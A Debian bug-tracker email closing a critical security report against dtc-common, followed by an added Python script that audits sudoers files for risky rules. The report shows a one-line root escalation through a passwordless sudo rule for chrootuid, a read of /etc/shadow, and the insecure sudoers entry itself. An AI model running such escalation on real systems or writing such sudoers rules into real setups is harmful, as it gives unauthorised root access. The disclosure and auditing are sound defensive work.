Your message dated Mon, 19 Dec 2011 10:55:19 +0800
with message-id <4eeea797.9020...@goirand.fr>
and subject line Also fixed in Lenny
has caused the Debian Bug report #637618,
regarding dtc-common: giving sudo access to chrootuid is giving access to root
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
637618: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=637618
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: dtc-common
Severity: critical
Tags: security
Justification: root security hole


The install script gives the dtc user (the user that is running
apache) unrestricted sudo access to chrootuid, which essentially gives root access
to the dtc account:

root@testdtc:/var/lib/dtc/etc# su - dtc
$ whoami
dtc
$ sudo chrootuid / root /bin/bash
root@testdtc:/# whoami
root
root@testdtc:/# wc -l /etc/shadow
27 /etc/shadow
root@testdtc:/# grep dtc /etc/sudoers
Defaults:dtc !set_logname
dtc      ALL= NOPASSWD: /usr/bin/chrootuid *

-- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (600, 'unstable'), (500, 'testing'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 3.0.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash



--- End Message ---
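
An added example (not part of the bug report or of the dtc package): a small Python check that flags sudoers rules of the kind quoted in the report, where a program that runs a caller-chosen command is allowed with open arguments. The function name audit_sudoers, the wrapper names other than chrootuid, and the "backup" sample line are assumptions made for illustration.

```python
import os
import re

# chrootuid comes from the report above; the other names are an illustrative,
# non-exhaustive assumption of programs that run a caller-chosen command.
EXEC_WRAPPERS = {"chrootuid", "chroot", "env", "nice", "nohup", "xargs"}
SKIP = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")
RULE = re.compile(r"^(\S+)\s+[^=\s]+\s*=\s*(.+)$")   # user host = specs
TAG = re.compile(r"^([A-Z_]+):\s*")                   # NOPASSWD:, NOEXEC:, ...

def audit_sudoers(text):
    """Return (lineno, user, command spec, nopasswd, reason) per risky spec.
    Simplified parser: one rule per line, no alias expansion, no escaped commas."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        m = RULE.match(line)
        if not m or line.startswith(SKIP):
            continue
        user, rest = m.group(1), re.sub(r"\([^)]*\)", "", m.group(2))  # drop Runas
        nopasswd = False
        for spec in (s.strip() for s in rest.split(",")):
            while (t := TAG.match(spec)):   # a tag stays in force for later specs
                if t.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = t.group(1) == "NOPASSWD"
                spec = spec[t.end():]
            cmd, _, args = spec.partition(" ")
            # No argument list, or a wildcard in it, leaves the arguments to the caller.
            open_args = not args.strip() or any(c in args for c in "*?[")
            if cmd == "ALL":
                reason = "every command allowed"
            elif os.path.basename(cmd) in EXEC_WRAPPERS and open_args:
                reason = "wrapper runs a caller-chosen program"
            else:
                continue
            findings.append((lineno, user, spec, nopasswd, reason))
    return findings

# Constructed sample: the two dtc lines are quoted from the report, the rest is made up.
SAMPLE = """\
Defaults:dtc !set_logname
dtc      ALL= NOPASSWD: /usr/bin/chrootuid *
backup   ALL=(root) NOPASSWD: /usr/bin/rsync --server *, /bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE):
        print(finding)
```
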
--- Begin Message ---

--- End Message ---
